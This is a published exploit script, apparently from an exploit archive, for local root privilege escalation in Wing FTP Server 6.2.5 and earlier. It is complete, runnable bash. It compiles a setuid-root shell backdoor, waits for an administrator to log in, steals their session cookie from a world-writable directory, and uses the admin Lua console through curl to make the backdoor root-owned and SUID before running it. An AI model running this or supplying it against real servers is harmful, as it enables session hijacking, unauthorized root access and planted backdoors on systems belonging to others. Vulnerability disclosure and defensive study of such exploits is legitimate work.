# Exploit Title: Wing FTP Server 6.2.5 - Privilege Escalation # Google Dork: intitle:"Wing FTP Server - Web" # Date: 2020-03-03 # Exploit Author: Cary Hooper # Vendor Homepage: https://www.wftpserver.com # Software Link: https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz # Version: v6.2.5 and prior # Tested on: Ubuntu 18.04 # CVE: N/A # If $_WINGFTPDIR is the installation directory where Wing FTP was installed, # $_WINGFTPDIR/wftpserver/session/* --> corresponds to user sessions... world readable/writeable (possibly exploitable) # $_WINGFTPDIR/wftpserver/session_admin/* --> corresponds to admin sessions... world readable/writeable. # We can wait for an admin to log in, steal their session, then launch a curl command which executes LUA. # https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php (writeup) #!/bin/bash echo 'Local root privilege escalation for Wing FTP Server (v.6.2.5)' echo 'Exploit by Cary Hooper (@nopantrootdance)' function writeBackdoor() { #this function creates a backdoor program (executes bash) echo " Writing backdoor in $1" echo '#include <stdio.h>' > $1/foobarh00p.c echo '#include <sys/types.h>' >> $1/foobarh00p.c echo '#include <unistd.h>' >> $1/foobarh00p.c echo 'int main(void){setuid(0); setgid(0); system("/bin/bash");}' >> $1/foobarh00p.c gcc -w $1/foobarh00p.c -o $1/foobarh00p } function makeRequest() { #Executes Lua command in admin panel to set the suid bit/chown on our backdoor #Change owner to root curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chown%20root%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html" >/dev/null 2>/dev/null #Make SUID curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chmod%204777%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html" >/dev/null 2>/dev/null } directories=( "/tmp" "/var/tmp" "/dev/shm" ) for dir in "${directories[@]}" do #Check if directories are writeable if [ -w $dir ] then echo "[!] Writeable directory found: $dir" export backdoordir=$dir break else echo " $dir is not writeable..."; fi done writeBackdoor $backdoordir #Look for directory where administrative sessions are handled ($_WINGFTPDIR/session_admin/). echo " Finding the wftpserver directory" export sessiondir=$(find / -name session_admin -type d 2>/dev/null | grep --color=never wftpserver) if [ -z "$sessiondir" ]; then echo "Wing FTP directory not found. Consider looking manually."; exit 1; fi #Note: if no directory is found, look manually for the "wftpserver" directory, or a "wftpserver" binary. Change the variable below and comment out the code above. #export sessiondir="/opt/wftpserver/session_admin" #While loop to wait for an admin session to be established. echo " Waiting for a Wing FTP admin to log in. This may take a while..." count=0 while : ; do if [ "$(ls -A $sessiondir)" ]; then #If a session file exists, the UID_ADMIN cookie is the name of the file. echo "[!] An administrator logged in... stealing their session." export cookie=$(ls -A $sessiondir | cut -d '.' -f1) export ip=$(cat $sessiondir/$cookie.lua | grep ipaddress| cut -d '[' -f4 | cut -d ']' -f1) echo " Changing IP restrictions on the cookie..." cat $sessiondir/$cookie.lua | sed "s/$ip/127.0.0.1/g" > $backdoordir/$cookie.lua cp $backdoordir/$cookie.lua $sessiondir/$cookie.lua rm $backdoordir/$cookie.lua echo "[!] Successfully stole session." #Once found, make the malicious curl request export urldir=$(sed "s/\//\%2F/g" <<<$backdoordir) echo " Making evil request as Wing FTP admin... (backdoor in ${backdoordir})" makeRequest $cookie $urldir break else #Checks every 10 seconds. Outputs date to terminal for user feedback purposes only. sleep 10 let "count+=1" if [ $count -eq 10 ]; then date; fi echo "..." fi done #Check if backdoor was created correctly if [ $(stat -c "%a" $backdoordir/foobarh00p) != "4777" ]; then echo " Something went wrong. Backdoor is not SUID"; exit 1; fi if [ $(stat -c "%U" $backdoordir/foobarh00p) != "root" ]; then echo " Something went wrong. Backdoor is not owned by root"; exit 1; fi echo " Backdoor is now SUID owned by root." echo "[!] Executing backdoor. Cross your fingers..." #Execute the backdoor... root! $backdoordir/foobarh00p